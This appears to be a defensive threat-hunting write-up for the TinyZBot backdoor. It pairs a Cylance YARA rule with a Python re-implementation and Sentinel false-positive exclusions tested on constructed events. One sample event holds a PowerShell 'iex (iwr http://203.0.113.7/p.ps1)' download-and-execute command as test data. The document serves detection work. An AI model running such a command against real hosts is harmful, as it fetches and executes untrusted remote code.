The hypothesis is that the detected activity may indicate an adversary attempting to exfiltrate data or establish a covert command-and-control channel using TinyZBot, the .NET backdoor that Cylance attributed to the Iranian Operation Cleaver campaign in its December 2014 report. The rule below identifies the TinyZBot binary by its embedded strings; it does not match domains or network traffic. SOC teams should proactively hunt for the surrounding behavior in Azure Sentinel to identify advanced persistent threats that may evade traditional signature-based detection.
YARA Rule
rule TinyZBot
{
    meta:
        author = "Cylance"
        date = "2014-12-02"
        description = "http://cylance.com/opcleaver"
    strings:
        // UTF-16LE only (wide); every other string below matches ASCII only
        $s1 = "NetScp" wide
        // .NET embedded resource name, which leaks the project name
        $s2 = "TinyZBot.Properties.Resources.resources"
        // name of the legitimate Aoao Watermark product the sample carries
        $s3 = "Aoao WaterMark"
        // helper name and executable name referenced by the sample
        $s4 = "Run_a_exe"
        $s5 = "netscp.exe"
        // compiler-generated .NET web-reference members of the SOAP C2 client
        $s6 = "get_MainModule_WebReference_DefaultWS"
        $s7 = "remove_CheckFileMD5Completed"
        // default namespace of Visual Studio-generated web services
        $s8 = "http://tempuri.org/"
        // actor marker: the Zhoupin handle and the "Cleaver" string the operation is named after
        $s9 = "Zhoupin_Cleaver"
    condition:
        ($s1 and $s2) or                 // bot name (wide) plus its resource name
        ($s3 and $s4 and $s5) or         // watermark disguise plus helper and exe name
        ($s6 and $s7 and $s8) or         // all three SOAP client artifacts together
        ($s9)                            // the actor marker on its own is enough
}
Deployment notes: YARA matches file content and process memory rather than network telemetry, so this rule belongs on endpoint scanners, mail and file-upload gateways, and sandbox pipelines; a hit on a host can then be pivoted into Azure Sentinel as an indicator for the hunt described above. The rule contains 9 string patterns ($s1 through $s9) and fires on any one of four combinations: the wide NetScp string together with the .NET resource name ($s1 and $s2), the Aoao WaterMark, Run_a_exe and netscp.exe strings together, the three .NET web-reference artifacts together ($s6, $s7 and the default tempuri.org namespace), or the Zhoupin_Cleaver marker alone. Only $s1 is declared wide, so it matches UTF-16LE text only; the remaining eight strings match ASCII only. That split is deliberate for a .NET assembly, whose metadata names (type, member and resource names) are stored as ASCII/UTF-8 while user string literals are stored as UTF-16, but it means a sample that carries only ASCII "NetScp" and the resource name will not trigger the first branch.
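To make the condition logic concrete, the following added example (not from the Cylance report or the yara project) re-implements the rule's string matching and four-branch condition in plain Python so it can be exercised offline without yara-python. The sample buffers are constructed, not real TinyZBot samples; they exist to show which combinations fire and, in particular, that the `wide` modifier makes ASCII "NetScp" invisible to $s1.

```python
"""Stand-alone evaluation of the TinyZBot YARA rule's strings and condition.

Added example: re-implements the rule logic in Python for offline testing.
All buffers below are constructed test data, not malware samples.
"""

# Rule strings as the bytes they would occupy in a file. Only $s1 carries the
# `wide` modifier, so it is encoded UTF-16LE; YARA's default (no modifier) is
# ASCII-only, which is what the remaining eight strings use.
STRINGS = {
    "$s1": "NetScp".encode("utf-16-le"),
    "$s2": b"TinyZBot.Properties.Resources.resources",
    "$s3": b"Aoao WaterMark",
    "$s4": b"Run_a_exe",
    "$s5": b"netscp.exe",
    "$s6": b"get_MainModule_WebReference_DefaultWS",
    "$s7": b"remove_CheckFileMD5Completed",
    "$s8": b"http://tempuri.org/",
    "$s9": b"Zhoupin_Cleaver",
}


def matched_strings(data: bytes) -> set:
    """Return the identifiers of rule strings found anywhere in `data`."""
    return {ident for ident, pattern in STRINGS.items() if pattern in data}


def tinyzbot_condition(found: set) -> bool:
    """The rule's condition, one boolean per OR-branch, exactly as written."""
    def have(*ids):
        return all(i in found for i in ids)
    return (
        have("$s1", "$s2")
        or have("$s3", "$s4", "$s5")
        or have("$s6", "$s7", "$s8")
        or have("$s9")
    )


def scan(data: bytes) -> tuple:
    """Evaluate the rule against a buffer; returns (matched, set_of_string_ids)."""
    found = matched_strings(data)
    return tinyzbot_condition(found), found


# Constructed buffers (a fake MZ header plus the strings of interest).
ASCII_NETSCP = b"MZ\x90\x00 NetScp \x00TinyZBot.Properties.Resources.resources\x00"
WIDE_NETSCP = (b"MZ\x90\x00" + "NetScp".encode("utf-16-le")
               + b"\x00\x00TinyZBot.Properties.Resources.resources\x00")
PARTIAL_WATERMARK = b"MZ\x90\x00Aoao WaterMark\x00Run_a_exe\x00"          # $s5 missing
SOAP_CLIENT = (b"MZ\x90\x00get_MainModule_WebReference_DefaultWS\x00"
               b"remove_CheckFileMD5Completed\x00http://tempuri.org/\x00")
ZHOUPIN = b"MZ\x90\x00padding\x00Zhoupin_Cleaver\x00"
BENIGN_DOTNET = b"MZ\x90\x00MyApp.Properties.Resources.resources\x00http://tempuri.org/\x00"

if __name__ == "__main__":
    for name, buf in [("ASCII_NETSCP", ASCII_NETSCP), ("WIDE_NETSCP", WIDE_NETSCP),
                      ("PARTIAL_WATERMARK", PARTIAL_WATERMARK), ("SOAP_CLIENT", SOAP_CLIENT),
                      ("ZHOUPIN", ZHOUPIN), ("BENIGN_DOTNET", BENIGN_DOTNET)]:
        matched, found = scan(buf)
        print(f"{name:18} matched={matched!s:5} strings={sorted(found)}")
```

The ASCII_NETSCP and WIDE_NETSCP pair is the point of the exercise: both carry the resource name, but only the UTF-16LE buffer satisfies $s1, so only it fires. BENIGN_DOTNET shows that the tempuri.org default namespace on its own, common to many legitimate .NET web-service clients, is not enough to trigger the third branch.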
False-positive tuning. The exclusions below apply to the Azure Sentinel host and network telemetry used for the hunt (process creation and outbound download events), not to the YARA rule itself, whose static strings are unaffected by process or URL filters. Key each exclusion on more than a process name, because a file name is trivially spoofed; where possible pair it with the image path and the exact destination host.
Scenario: A system administrator uses PowerShell for a scheduled cleanup task that downloads a script from a trusted internal repository.
Filter/Exclusion: Exclude events where the process is powershell.exe launched with -Command and the download URL points at the known internal script repository. An internal source IP on its own is not a useful discriminator, since every managed host has one.
Scenario: A SQL Server Agent job runs a maintenance task that downloads a database backup from a remote server.
Filter/Exclusion: Exclude events where the process name is sqlservr.exe (or SQLAGENT.EXE for the agent itself) and the destination path is under a known backup directory.
Scenario: A Windows Update cycle initiated via Group Policy or WSUS temporarily downloads updates from Microsoft servers.
Filter/Exclusion: Exclude events where the process is wuauclt.exe (or, on current Windows versions, the svchost.exe instance hosting the wuauserv service) and the URL host is under windowsupdate.microsoft.com or is the organization's WSUS server.
Scenario: A CI/CD pipeline (e.g., Jenkins, GitLab CI) pulls code from a remote Git repository as part of a deployment.
Filter/Exclusion: Exclude events where the process name is java.exe (or the relevant CI runner or git.exe) and the URL matches an approved Git repository host.
Scenario: A log management tool (e.g., Splunk, ELK Stack) fetches logs from a remote server for centralized logging.
Filter/Exclusion: Exclude events where the process name is splunkd.exe (or the relevant log agent), the image runs from its installation directory, and the URL is the known internal log server.
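The following added example (not from the page, Cylance, or any Sentinel content pack) applies the five exclusions above to a handful of constructed telemetry events and shows what survives as an alert. Each event is a dict with the fields the filters key on (process name, command line, URL, destination path); the allow-listed hosts and directories are placeholders to be replaced with the environment's real values. One assumption goes beyond the page: the log-forwarder exclusion also checks the image path, so a binary renamed splunkd.exe in a user-writable directory is not silently suppressed.

```python
"""False-positive exclusions for the TinyZBot hunt, applied to sample events.

Added example with constructed data. Allow-lists are placeholders; the
image-path check on the log-forwarder exclusion is an added hardening
assumption, not one of the page's own filters.
"""
from urllib.parse import urlparse

# Constructed allow-lists (replace with real values for the environment).
INTERNAL_SCRIPT_HOSTS = {"scripts.corp.example"}
BACKUP_DIRS = ("d:\\backups\\", "\\\\backupsrv\\sql\\")   # compared lower-case
GIT_HOSTS = {"git.corp.example"}
LOG_HOSTS = {"logs.corp.example"}


def host_of(url: str) -> str:
    """Lower-cased host part of a URL, or '' when there is none."""
    return (urlparse(url).hostname or "").lower()


def is_excluded(ev: dict):
    """Return the name of the exclusion that suppresses `ev`, or None to alert."""
    proc = ev.get("process_name", "").lower()
    image = ev.get("image_path", "").lower()
    cmd = ev.get("command_line", "").lower()
    host = host_of(ev.get("url", ""))
    dest = ev.get("destination_path", "").lower()

    # 1. Scheduled PowerShell cleanup pulling a script from the internal repo.
    if proc == "powershell.exe" and "-command" in cmd and host in INTERNAL_SCRIPT_HOSTS:
        return "internal-powershell-script"
    # 2. SQL Server maintenance writing into a known backup directory.
    if proc == "sqlservr.exe" and dest.startswith(BACKUP_DIRS):
        return "sql-backup"
    # 3. Windows Update client talking to Microsoft update infrastructure.
    if proc == "wuauclt.exe" and host.endswith("windowsupdate.microsoft.com"):
        return "windows-update"
    # 4. CI runner fetching from the approved Git server.
    if proc == "java.exe" and host in GIT_HOSTS:
        return "ci-git-fetch"
    # 5. Log forwarder pulling from the internal log server. Added assumption:
    #    the image must live under Program Files so a renamed binary elsewhere
    #    still alerts.
    if proc == "splunkd.exe" and host in LOG_HOSTS and image.startswith("c:\\program files\\"):
        return "log-forwarder"
    return None


def triage(events):
    """Split events into (suppressed_ids, alert_ids), preserving input order."""
    suppressed, alerts = [], []
    for ev in events:
        (suppressed if is_excluded(ev) else alerts).append(ev["id"])
    return suppressed, alerts


# Constructed sample events: five benign cases plus two that must still alert.
SAMPLE_EVENTS = [
    {"id": "ps-ok", "process_name": "powershell.exe",
     "image_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell.exe -Command \"iex (iwr https://scripts.corp.example/cleanup.ps1)\"",
     "url": "https://scripts.corp.example/cleanup.ps1"},
    {"id": "ps-ext", "process_name": "powershell.exe",
     "image_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell.exe -Command \"iex (iwr http://203.0.113.7/p.ps1)\"",
     "url": "http://203.0.113.7/p.ps1"},
    {"id": "sql-ok", "process_name": "sqlservr.exe",
     "image_path": "C:\\Program Files\\Microsoft SQL Server\\MSSQL\\Binn\\sqlservr.exe",
     "destination_path": "D:\\Backups\\prod_full.bak"},
    {"id": "wu-ok", "process_name": "wuauclt.exe",
     "image_path": "C:\\Windows\\System32\\wuauclt.exe",
     "url": "https://www.windowsupdate.microsoft.com/cab/update.cab"},
    {"id": "ci-ok", "process_name": "java.exe",
     "image_path": "C:\\Program Files\\Jenkins\\jre\\bin\\java.exe",
     "url": "https://git.corp.example/infra/app.git"},
    {"id": "splunk-ok", "process_name": "splunkd.exe",
     "image_path": "C:\\Program Files\\Splunk\\bin\\splunkd.exe",
     "url": "https://logs.corp.example:8089/services"},
    {"id": "splunk-fake", "process_name": "splunkd.exe",
     "image_path": "C:\\Users\\Public\\splunkd.exe",
     "url": "https://logs.corp.example:8089/services"},
]

if __name__ == "__main__":
    suppressed, alerts = triage(SAMPLE_EVENTS)
    print("suppressed:", suppressed)
    print("alerts:    ", alerts)
```

The two events that remain as alerts illustrate the caveat in the tuning notes: ps-ext uses the same process and switch as the legitimate cleanup job but fetches from an unknown host, and splunk-fake has the right process name and destination but runs from a user-writable directory, which the page's name-and-URL filter alone would have excluded.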